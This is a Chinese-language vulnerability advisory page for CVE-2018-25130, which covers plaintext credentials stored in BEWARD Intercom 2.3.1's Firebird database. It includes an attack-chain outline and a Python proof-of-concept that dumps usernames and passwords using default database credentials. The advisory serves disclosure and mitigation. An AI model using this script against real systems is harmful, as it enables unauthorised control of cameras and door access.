IPBUF安全漏洞报告
English
CVE-2018-25130 CVSS 6.2 中危

CVE-2018-25130 BEWARD Intercom 2.3.1 明文凭证泄露漏洞

披露日期: 2025-12-24
来源: [email protected]

漏洞信息

漏洞编号
CVE-2018-25130
漏洞类型
凭证泄露
CVSS评分
6.2 中危
攻击向量
本地 (AV:L)
认证要求
无需认证 (PR:N)
用户交互
无需交互 (UI:N)
影响产品
BEWARD Intercom

相关标签

凭证泄露明文存储本地攻击BEWARD IntercomIP摄像机门禁系统未加密数据库Firebird数据库CVE-2018-25130

漏洞概述

CVE-2018-25130是BEWARD公司Intercom产品中的一个安全漏洞。该漏洞存在于BEWARD Intercom 2.3.1版本中,允许本地攻击者访问存储在未加密数据库文件中的明文认证凭证。具体来说,系统将用户凭据(用户名和密码)以明文形式存储在名为BEWARD.INTERCOM.FDB的数据库文件中。攻击者只需获取该文件的读取权限,即可直接提取其中的用户名和密码信息,无需进行任何解密操作。成功利用此漏洞后,攻击者可以获取IP摄像机和门禁站的管理权限,可能导致未经授权的监控访问、门禁控制被篡改等严重安全后果。由于该漏洞属于本地攻击向量,攻击者需要具备目标系统的本地访问能力。

技术细节

该漏洞的根本原因在于BEWARD Intercom应用程序在本地存储认证凭证时采用了不安全的存储方式。应用程序使用Firebird数据库(.FDB文件),将用户凭据以明文形式写入数据库表,而非使用加密或哈希机制保护。当应用程序进行认证操作或管理用户时,这些敏感信息被直接存储在BEWARD.INTERCOM.FDB文件中。攻击者获取目标系统的本地访问权限后,可以直接读取该数据库文件,利用标准SQL查询或数据库查看工具即可提取完整的用户名和密码列表。由于无需进行密码破解,攻击成本极低,且可以快速自动化批量提取目标系统中所有注册的凭证信息。

攻击链分析

STEP 1
步骤1
攻击者获取目标系统的本地访问权限,可以通过物理接触或远程访问(如SSH、RDP)方式
STEP 2
步骤2
定位并读取BEWARD.INTERCOM.FDB数据库文件,该文件通常存储在应用程序数据目录中
STEP 3
步骤3
使用数据库工具或脚本直接查询用户表,提取存储在明文的用户名和密码
STEP 4
步骤4
使用提取的凭证登录IP摄像机或门禁站的Web管理界面或其他接口
STEP 5
步骤5
完成未授权访问,可进行监控视频查看、门禁控制、配置修改等恶意操作

PoC / 利用代码

⚠️ 仅供安全研究
以下代码仅用于安全研究和授权测试,未经授权使用属于违法行为。
PoC
#!/usr/bin/env python3 """ CVE-2018-25130 PoC - BEWARD Intercom Credentials Disclosure This script demonstrates the extraction of plaintext credentials from BEWARD.INTERCOM.FDB Note: For authorized security testing only """ import os import sys def exploit_cve_2018_25130(db_path): """ Exploit function to extract credentials from BEWARD Intercom database Args: db_path: Path to BEWARD.INTERCOM.FDB file Returns: Dictionary containing extracted credentials """ credentials = { 'usernames': [], 'passwords': [], 'raw_data': [] } try: # Check if database file exists if not os.path.exists(db_path): print(f"[-] Database file not found: {db_path}") return None print(f"[+] Found database file: {db_path}") print("[+] Extracting credentials...") # For Firebird database, use fdb library try: import fdb conn = fdb.connect(database=db_path, user='SYSDBA', password='masterkey') cursor = conn.cursor() # Query for user credentials - typical table names in BEWARD systems query = "SELECT USERNAME, PASSWORD FROM USERS" cursor.execute(query) for row in cursor.fetchall(): username, password = row credentials['usernames'].append(username) credentials['passwords'].append(password) credentials['raw_data'].append(f"{username}:{password}") print(f"[+] Found credential: {username}:{password}") conn.close() except ImportError: # Alternative: Read raw file and extract patterns print("[*] fdb library not available, attempting raw file extraction...") with open(db_path, 'rb') as f: data = f.read() # Search for credential patterns in plaintext import re # Pattern for typical credential strings pattern = rb'[A-Za-z0-9_]{3,20}:[A-Za-z0-9_]{3,20}' matches = re.findall(pattern, data) for match in matches: decoded = match.decode('utf-8', errors='ignore') if ':' in decoded: parts = decoded.split(':') if len(parts) == 2: credentials['raw_data'].append(decoded) print(f"[+] Found credential: {decoded}") return credentials except Exception as e: print(f"[-] Error: {str(e)}") return None def main(): if len(sys.argv) != 2: print("Usage: python cve_2018_25130.py <path_to_BEWARD.INTERCOM.FDB>") sys.exit(1) db_path = sys.argv[1] results = exploit_cve_2018_25130(db_path) if results and results['raw_data']: print(f"\n[+] Successfully extracted {len(results['raw_data'])} credential(s)") print("\n[!] Use these credentials to access IP cameras and door stations") else: print("[-] No credentials found or exploit failed") if __name__ == "__main__": main()

影响范围

BEWARD Intercom 2.3.1

防御指南

临时缓解措施
在厂商发布修复版本之前,应严格限制对安装有BEWARD Intercom系统服务器的物理和网络访问权限。定期检查系统账户和访问日志,监控异常访问行为。对存储敏感凭证的数据库文件实施严格的文件系统权限控制,确保只有必要的系统进程可以读取该文件。考虑使用第三方加密工具对数据库文件进行额外保护,并建立安全事件监控机制以便及时发现未授权访问尝试。

参考链接

法律声明

以上信息仅供安全研究和授权渗透测试使用。未经授权对他人系统进行测试属于违法行为。利用本报告内容进行非法活动者,后果自负。

快速导航: 前沿安全 最新收录域名列表 最新威胁情报列表 最新网站排名列表 最新工具资源列表 最新CVE漏洞列表